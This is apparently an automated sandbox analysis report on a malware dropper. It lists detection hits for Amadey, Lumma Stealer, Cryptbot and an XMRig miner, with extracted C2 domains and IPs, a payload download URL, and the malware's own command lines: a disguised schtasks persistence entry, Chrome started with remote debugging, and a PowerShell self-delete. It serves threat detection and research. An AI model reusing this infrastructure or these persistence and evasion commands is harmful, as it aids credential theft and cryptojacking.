53.2.explorer.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
3.2.skotes.exe.900000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x324cc8:$x1: donate.ssl.xmrig.com
52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x325978:$s1: %s/%s (Windows NT %lu.%lu 0x329580:$s3: \\.\WinRing0_ 0x2e3130:$s4: pool_wallet 0x2dd978:$s5: cryptonight 0x2dd988:$s5: cryptonight 0x2dd998:$s5: cryptonight 0x2dd9a8:$s5: cryptonight 0x2dd9c0:$s5: cryptonight 0x2dd9d0:$s5: cryptonight 0x2dd9e0:$s5: cryptonight 0x2dd9f8:$s5: cryptonight 0x2dda08:$s5: cryptonight 0x2dda20:$s5: cryptonight 0x2dda38:$s5: cryptonight 0x2dda48:$s5: cryptonight 0x2dda58:$s5: cryptonight 0x2dda68:$s5: cryptonight 0x2dda80:$s5: cryptonight 0x2dda98:$s5: cryptonight 0x2ddaa8:$s5: cryptonight 0x2ddab8:$s5: cryptonight
49.2.explorer.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
49.2.explorer.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
49.2.explorer.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe, ParentProcessId: 4412, ParentProcessName: bc8eaffed4.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 6976, ProcessName: chrome.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1444, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 4312, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe, ParentProcessId: 4568, ParentProcessName: 4ec75545d6.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1008, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1444, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 4040, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe, ParentProcessId: 4568, ParentProcessName: 4ec75545d6.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1008, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:27.585059+0100	2028371	3	Unknown Traffic	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:32.967233+0100	2028371	3	Unknown Traffic	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:33.268102+0100	2028371	3	Unknown Traffic	192.168.2.8	49717	104.21.23.76	443	TCP
2024-12-18T13:38:39.556269+0100	2028371	3	Unknown Traffic	192.168.2.8	49719	104.21.23.76	443	TCP
2024-12-18T13:38:39.968181+0100	2028371	3	Unknown Traffic	192.168.2.8	49718	104.21.64.80	443	TCP
2024-12-18T13:38:44.580137+0100	2028371	3	Unknown Traffic	192.168.2.8	49722	104.21.64.80	443	TCP
2024-12-18T13:38:49.448251+0100	2028371	3	Unknown Traffic	192.168.2.8	49726	104.21.64.80	443	TCP
2024-12-18T13:38:52.719107+0100	2028371	3	Unknown Traffic	192.168.2.8	49728	104.21.64.80	443	TCP
2024-12-18T13:38:56.687830+0100	2028371	3	Unknown Traffic	192.168.2.8	49730	104.21.64.80	443	TCP
2024-12-18T13:39:00.415474+0100	2028371	3	Unknown Traffic	192.168.2.8	49732	104.21.64.80	443	TCP
2024-12-18T13:42:55.163723+0100	2028371	3	Unknown Traffic	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:42:59.412380+0100	2028371	3	Unknown Traffic	192.168.2.8	50099	104.21.64.80	443	TCP
2024-12-18T13:43:04.937462+0100	2028371	3	Unknown Traffic	192.168.2.8	50103	104.21.64.80	443	TCP
2024-12-18T13:43:08.962327+0100	2028371	3	Unknown Traffic	192.168.2.8	50106	104.21.64.80	443	TCP
2024-12-18T13:43:11.848249+0100	2028371	3	Unknown Traffic	192.168.2.8	50108	104.21.64.80	443	TCP
2024-12-18T13:43:16.286870+0100	2028371	3	Unknown Traffic	192.168.2.8	50110	104.21.64.80	443	TCP
2024-12-18T13:43:19.298885+0100	2028371	3	Unknown Traffic	192.168.2.8	50112	104.21.64.80	443	TCP
2024-12-18T13:43:23.733488+0100	2028371	3	Unknown Traffic	192.168.2.8	50114	104.21.64.80	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:31.630080+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:38.288601+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:39.224868+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49717	104.21.23.76	443	TCP
2024-12-18T13:39:01.139241+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49732	104.21.64.80	443	TCP
2024-12-18T13:42:58.019903+0100	2054653	1	A Network Trojan was detected	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:43:03.443375+0100	2054653	1	A Network Trojan was detected	192.168.2.8	50099	104.21.64.80	443	TCP
2024-12-18T13:43:24.730899+0100	2054653	1	A Network Trojan was detected	192.168.2.8	50114	104.21.64.80	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:31.630080+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:39.224868+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49717	104.21.23.76	443	TCP
2024-12-18T13:42:58.019903+0100	2049836	1	A Network Trojan was detected	192.168.2.8	50097	104.21.64.80	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:38.288601+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:43:03.443375+0100	2049812	1	A Network Trojan was detected	192.168.2.8	50099	104.21.64.80	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:27.585059+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49713	104.21.64.80	443	TCP
2024-12-18T13:38:32.967233+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49716	104.21.64.80	443	TCP
2024-12-18T13:38:39.968181+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49718	104.21.64.80	443	TCP
2024-12-18T13:38:44.580137+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49722	104.21.64.80	443	TCP
2024-12-18T13:38:49.448251+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49726	104.21.64.80	443	TCP
2024-12-18T13:38:52.719107+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49728	104.21.64.80	443	TCP
2024-12-18T13:38:56.687830+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49730	104.21.64.80	443	TCP
2024-12-18T13:39:00.415474+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	49732	104.21.64.80	443	TCP
2024-12-18T13:42:55.163723+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50097	104.21.64.80	443	TCP
2024-12-18T13:42:59.412380+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50099	104.21.64.80	443	TCP
2024-12-18T13:43:04.937462+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50103	104.21.64.80	443	TCP
2024-12-18T13:43:08.962327+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50106	104.21.64.80	443	TCP
2024-12-18T13:43:11.848249+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50108	104.21.64.80	443	TCP
2024-12-18T13:43:16.286870+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50110	104.21.64.80	443	TCP
2024-12-18T13:43:19.298885+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50112	104.21.64.80	443	TCP
2024-12-18T13:43:23.733488+0100	2058365	1	Domain Observed Used for C2 Detected	192.168.2.8	50114	104.21.64.80	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:18.056255+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49709	185.215.113.43	80	TCP
2024-12-18T13:38:24.917678+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49711	185.215.113.43	80	TCP
2024-12-18T13:38:31.731537+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49714	185.215.113.43	80	TCP
2024-12-18T13:38:44.025378+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49720	185.215.113.43	80	TCP
2024-12-18T13:38:56.297913+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49729	185.215.113.43	80	TCP
2024-12-18T13:41:53.491835+0100	2044696	1	A Network Trojan was detected	192.168.2.8	50076	185.215.113.43	80	TCP
2024-12-18T13:42:53.750564+0100	2044696	1	A Network Trojan was detected	192.168.2.8	50096	185.215.113.43	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:39:16.968203+0100	2054350	1	A Network Trojan was detected	192.168.2.8	49762	185.185.71.170	80	TCP
2024-12-18T13:39:19.017359+0100	2054350	1	A Network Trojan was detected	192.168.2.8	49769	185.185.71.170	80	TCP
2024-12-18T13:39:28.696623+0100	2054350	1	A Network Trojan was detected	192.168.2.8	49802	185.185.71.170	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:25.892319+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.8	60772	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:25.669010+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.8	62284	1.1.1.1	53	UDP
2024-12-18T13:42:53.800179+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.8	63160	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:53.561903+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49728	104.21.64.80	443	TCP
2024-12-18T13:43:07.671503+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	50103	104.21.64.80	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:06.643334+0100	2856147	1	A Network Trojan was detected	192.168.2.8	49704	185.215.113.43	80	TCP
2024-12-18T13:43:15.075635+0100	2856147	1	A Network Trojan was detected	192.168.2.8	50109	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:16.719526+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.8	49707	TCP
2024-12-18T13:41:52.154565+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.8	50074	TCP
2024-12-18T13:42:52.413957+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.8	50094	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:38:11.076185+0100	2803305	3	Unknown Traffic	192.168.2.8	49708	31.41.244.11	80	TCP
2024-12-18T13:38:19.504325+0100	2803305	3	Unknown Traffic	192.168.2.8	49710	31.41.244.11	80	TCP
2024-12-18T13:38:26.434235+0100	2803305	3	Unknown Traffic	192.168.2.8	49712	31.41.244.11	80	TCP
2024-12-18T13:38:33.204010+0100	2803305	3	Unknown Traffic	192.168.2.8	49715	31.41.244.11	80	TCP
2024-12-18T13:38:45.499795+0100	2803305	3	Unknown Traffic	192.168.2.8	49723	31.41.244.11	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://grannyejh.lat/apis	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apiY	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/ic	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat:443/api	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apit	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/pi.V	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/.	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/944	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apiXV	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apigs6#Y	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/H	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/C	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/api	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/M	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/api.V	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/api5	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat:443/apin	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apit)0	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/dodo/random.exe	Avira URL Cloud: Label: phishing
Source: https://grannyejh.lat/hne	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/_	Avira URL Cloud: Label: malware
Source: https://grannyejh.lat/apiore%#J	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Avira: detection malicious, Label: HEUR/AGEN.1352802

Found malware configuration

Source: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "pancakedipyps.click", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat"], "Build id": "FATE99--test"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	ReversingLabs: Detection: 66%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: rapeflowwj.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: crosshuaht.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: sustainskelet.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: aspecteirs.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: energyaffai.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: necklacebudi.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: discokeyus.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: grannyejh.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: sweepyribs.lat
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: TeslaBrowser/5.5
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: - Screen Resoluton:
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: - Physical Installed Memory:
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: Workgroup: -
Source: 14.2.3a1a782de7.exe.400000.1.unpack	String decryptor: yau6Na--6989783370

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0030123B CryptContextAddRef,		14_2_0030123B
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00416124 CryptUnprotectData,		14_2_00416124

Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_18b9b6cf-e

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.2999450325.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.3593333371.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.3593333371.0000000001129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3000778509.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.3594232724.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2999450325.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.3594079796.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2999450325.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3000666854.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 5168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5908, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50099 version: TLS 1.2
